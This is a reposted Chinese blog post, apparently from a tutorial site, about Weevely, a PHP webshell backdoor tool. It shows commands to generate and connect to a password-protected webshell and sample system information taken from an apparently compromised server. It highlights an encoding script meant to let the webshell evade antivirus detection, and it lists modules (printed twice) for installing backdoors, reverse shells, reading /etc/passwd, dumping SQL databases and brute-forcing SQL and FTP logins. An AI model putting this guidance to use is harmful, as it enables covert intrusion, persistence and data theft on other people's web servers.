博客
关于我
强烈建议你试试无所不能的chatGPT,快点击我
weevely-------linux中的菜刀(转载)
阅读量:5276 次
发布时间:2019-06-14

本文共 2199 字,大约阅读时间需要 7 分钟。

weevely 是BT5中一个常用的webshell后门连接工具,它发挥的作用类似于中国菜刀(chopper)。

# ./weevely.py generate ices gen.php

// 生成一个密码为 ices 的php webshell.

# ./weevely.py ices

// ./weevely.py [password]         连接

:system.info

// 按两下 tab键,进入操控模式,例如输入 system.info 获得系统信息

whoami:       apache

hostname:    HQEBWEBJ

basedir:                 /app/ecccs/web/common

uname:            Linux HQEBWEBJ 2.6.18-92.el5 #1 SMP Tue Apr 29 13:16:15 EDT 2008 x86_64 GNU/Linux

os:                     Linux

document_root:  /home/ecccs/web

safe_mode:           0

script:                     /common/gen.php

client_ip:               120.3*.56.156

max_execution_time:  30

php_self:                          /common/gen.php

cat /etc/issue

Red Hat Enterprise Linux Server release 5.2 (Tikanga) Kernel

// 执行一般的命令

加密功能

提取了weevely的  (其实这才是本文的亮点,用来免杀webshell)

$ python test.py  原.php  密.php

如下图,加密后的php一句话webshell代码中,只出现了str_replace这个熟知的函数,未出现其他关键字,这要查杀是非常难滴。

 

功能模块

系统 system.info             //收集系统信息 文件 file.read                   //读文件 file.upload               //上传本地文件 file.check                 //检查文件的权限和 file.enum                 //在本地词表的书面枚举远程文件 file.download          //下载远程二进制/ ASCII文件到本地 SQL sql.query                //执行SQL查询 sql.console            //启动SQL控制台 sql.dump               //获取SQL数据库转储 sql.summary         //获取SQL数据库中的表和列 后门 backdoor.tcp                       //TCP端口后门 backdoor.install                  //安装后门 backdoor.reverse_tcp        //反弹 枚举 audit.user_files                  //在用户家中列举常见的机密文件 audit.user_web_files        //列举常见的Web文件 audit.etc_passwd              //枚举/etc/passwd 查找 find.webdir             //查找可写的web目录 find.perm                     //查找权限可读/写/可执行文件和目录 find.name                    //按名称查找文件和目录 find.suidsgid                //查找SUID / SGID文件和目录 暴破 bruteforce.sql                    //暴力破解单一SQL用户 bruteforce.sql_users        //暴力破解SQL密码 bruteforce.ftp                    // 暴力破解单一FTP用户 bruteforce.ftp_users         //暴力破解FTP密码 系统 system.info   //收集系统信息 文件 file.read        //读文件 file.upload        //上传本地文件 file.check        //检查文件的权限和 file.enum        //在本地词表的书面枚举远程文件 file.download        //下载远程二进制/ ASCII文件到本地 SQL sql.query        //执行SQL查询 sql.console        //启动SQL控制台 sql.dump        //获取SQL数据库转储 sql.summary        //获取SQL数据库中的表和列 后门 backdoor.tcp                //TCP端口后门 backdoor.install        //安装后门 backdoor.reverse_tcp        //反弹 枚举 audit.user_files        //在用户家中列举常见的机密文件 audit.user_web_files        //列举常见的Web文件 audit.etc_passwd        //枚举/etc/passwd 查找 find.webdir        //查找可写的web目录 find.perm        //查找权限可读/写/可执行文件和目录 find.name        //按名称查找文件和目录 find.suidsgid        //查找SUID / SGID文件和目录 暴破 bruteforce.sql                //暴力破解单一SQL用户 bruteforce.sql_users        //暴力破解SQL密码 bruteforce.ftp               // 暴力破解单一FTP用户 bruteforce.ftp_users        //暴力破解FTP密码

weevely–linux中的菜刀

转载于:https://www.cnblogs.com/demonspider/archive/2013/04/05/3001139.html

你可能感兴趣的文章
类和结构
查看>>
python 之 循环语句
查看>>
心得25--JDK新特性9-泛型1-加深介绍
查看>>
HDOJ 1754 I Hate It(线段树基本操作)
查看>>
latex tree
查看>>
安装NVIDIA驱动时禁用自带nouveau驱动
查看>>
HDU-1255 覆盖的面积 (扫描线)
查看>>
【USACO】 奶牛会展
查看>>
继承和多态
查看>>
Dijkstra+计算几何 POJ 2502 Subway
查看>>
修复IE不能执行JS的方法
查看>>
程序员究竟该如何提高效率zt
查看>>
希尔排序法(缩小增量法)
查看>>
PHP编程基础学习(一)——数据类型
查看>>
Android笔记 Handler
查看>>
java.util.Arrays类详解
查看>>
NYOJ-626-intersection set(二分查找)
查看>>
项目管理之路(1):初步踏入项目管理
查看>>
Java 中 静态方法与非静态方法的区别
查看>>
echarts饼图显示百分比
查看>>